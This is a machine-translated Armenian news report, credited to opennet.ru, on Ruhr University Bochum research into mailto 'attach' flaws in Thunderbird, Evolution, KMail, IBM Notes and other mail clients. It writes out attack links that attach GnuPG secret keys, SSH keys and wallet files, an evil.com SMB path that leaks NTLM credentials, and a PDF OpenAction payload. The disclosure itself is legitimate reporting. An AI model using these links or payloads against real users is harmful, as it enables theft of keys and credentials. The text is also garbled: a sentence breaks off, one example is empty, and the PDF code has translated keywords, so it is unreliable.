Ռուրի համալսարանի Բոխումի (Գերմանիա) հետազոտողները
Հղումներ «
Փոստի հաճախորդները Thunderbird-ը, GNOME Evolution-ը (CVE-2020-11879), KDE KMail-ը (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) և Pegasus Mail-ը խոցելի էին չնչին հարձակման նկատմամբ, որը թույլ է տալիս ավտոմատ կերպով կցել: ցանկացած տեղական ֆայլ, որը նշված է «mailto:?attach=path_to_file» հղման միջոցով: Ֆայլը կցվում է առանց նախազգուշացման, ուստի առանց հատուկ ուշադրության օգտատերը կարող է չնկատել, որ նամակը կուղարկվի հավելվածով:
Օրինակ՝ օգտագործելով «mailto:[էլեկտրոնային փոստով պաշտպանված]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" կարող եք GnuPG-ից անձնական բանալիներ տեղադրել տառի մեջ: Կարող եք նաև ուղարկել կրիպտո դրամապանակների (~/.bitcoin/wallet.dat), SSH ստեղների (~/.ssh/id_rsa) և օգտատիրոջը հասանելի ցանկացած ֆայլերի պարունակությունը: Ավելին, Thunderbird-ը թույլ է տալիս դիմակով կցել ֆայլերի խմբեր՝ օգտագործելով այնպիսի կառուցվածքներ, ինչպիսիք են «attach=/tmp/*.txt»:
Ի հավելումն տեղական ֆայլերի, որոշ էլփոստի հաճախորդներ մշակում են հղումներ դեպի ցանցային պահեստ և ուղիներ IMAP սերվերում: Մասնավորապես, IBM Notes-ը թույլ է տալիս ֆայլը փոխանցել ցանցային գրացուցակից՝ «attach=\\evil.com\dummyfile» հղումները մշակելիս, ինչպես նաև ընդհատել NTLM վավերացման պարամետրերը՝ հղում ուղարկելով հարձակվողի կողմից վերահսկվող SMB սերվերին: (հարցը կուղարկվի նույնականացման ընթացիկ պարամետրերի օգտագործողի հետ):
Thunderbird-ը հաջողությամբ մշակում է «attach=imap:///fetch>UID>/INBOX>1/» հարցումները, որոնք թույլ են տալիս կցել բովանդակություն IMAP սերվերի թղթապանակներից: Միևնույն ժամանակ, IMAP-ից գաղտնագրված հաղորդագրությունները, որոնք գաղտնագրված են OpenPGP-ի և S/MIME-ի միջոցով, փոստի հաճախորդի կողմից ավտոմատ կերպով վերծանվում են նախքան ուղարկելը: Thunderbird-ի մշակողները եղել են
Thunderbird-ի հին տարբերակները խոցելի էին նաև հետազոտողների կողմից առաջարկված PGP-ի և S/MIME-ի վրա հարձակման երկու այլ տարբերակների նկատմամբ: Մասնավորապես, Thunderbird-ը, ինչպես նաև OutLook-ը, PostBox-ը, eM Client-ը, MailMate-ը և R2Mail2-ը ենթարկվել են բանալու փոխարինման հարձակման՝ կապված այն բանի հետ, որ փոստային հաճախորդը ավտոմատ կերպով ներմուծում և տեղադրում է S/MIME հաղորդագրություններում փոխանցված նոր վկայագրեր, ինչը թույլ է տալիս. հարձակվողը կազմակերպել օգտատիրոջ կողմից արդեն պահված հանրային բանալիների փոխարինումը:
Երկրորդ գրոհը, որին ենթակա են Thunderbird-ը, PostBox-ը և MailMate-ը, շահարկում է հաղորդագրությունների հաղորդագրության ավտոմատ պահպանման մեխանիզմը և թույլ է տալիս, օգտագործելով mailto պարամետրերը, սկսել գաղտնագրված հաղորդագրությունների վերծանումը կամ կամայական հաղորդագրությունների համար թվային ստորագրության ավելացումը, արդյունքի հետագա փոխանցումը հարձակվողի IMAP սերվերին: Այս հարձակման ժամանակ գաղտնագրված տեքստը փոխանցվում է «body» պարամետրի միջոցով, իսկ «meta refresh» թեգը օգտագործվում է հարձակվողի IMAP սերվերին զանգ սկսելու համար: Օրինակ: ' '
«mailto:» հղումները ավտոմատ կերպով մշակելու համար առանց օգտվողի փոխազդեցության, կարող են օգտագործվել հատուկ մշակված PDF փաստաթղթեր. OpenAction գործողությունը PDF-ում թույլ է տալիս ավտոմատ կերպով գործարկել mailto մշակիչը փաստաթուղթ բացելիս.
%PDF-1.5
1 0 առարկ
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 առարկ
<< /Տեսակ /Գործողություն /S /URI/URI (փոստ՝?body=——ՍԿՍԵԼ PGP հաղորդագրությունը——[…])>>
endobj
Source: opennet.ru